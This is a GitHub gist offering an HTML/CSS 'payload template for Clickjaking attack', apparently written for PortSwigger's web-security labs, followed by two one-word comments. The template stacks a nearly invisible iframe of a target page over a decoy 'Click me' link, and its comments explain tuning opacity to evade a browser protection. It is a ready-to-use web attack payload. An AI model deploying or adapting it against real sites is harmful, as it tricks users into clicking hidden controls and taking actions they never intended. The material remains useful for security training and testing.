Skip to content

Instantly share code, notes, and snippets.

@righettod
Created October 5, 2019 08:27
Show Gist options
  • Save righettod/3a9d041be572f4dd9fd76e5ff23a40d0 to your computer and use it in GitHub Desktop.
Save righettod/3a9d041be572f4dd9fd76e5ff23a40d0 to your computer and use it in GitHub Desktop.
Payload template for Clickjaking attack.
<head>
<!-- Big up to https://portswigger.net/web-security/clickjacking labs :) -->
<style>
.target_website {
position:relative;
width:800px;
height:400px;
#Set opacity to 0.5 to see overlay allowing preparation of the attack
#Set opacity to 0.00001 to made the target frame site transparent and bypass some browser protection on opacity like one in chrome for example
#See https://www.w3schools.com/css/css_image_transparency.asp
opacity:0.5;
z-index:2;
}
.decoy_website {
position:absolute;
width:800px;
height:400px;
z-index:1;
}
</style>
</head>
<body>
<div id="decoy_website" class="decoy_website"><a href="#" style="position: absolute; top: 787px; left: 35px;">Click me</a></div>
<iframe id="target_website" src="https://target.com/endpoint" class="target_website" sandbox="allow-forms"></iframe>
</body>
@mateenab
Copy link

hi

@fredericgoossens
Copy link

hi

hi

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment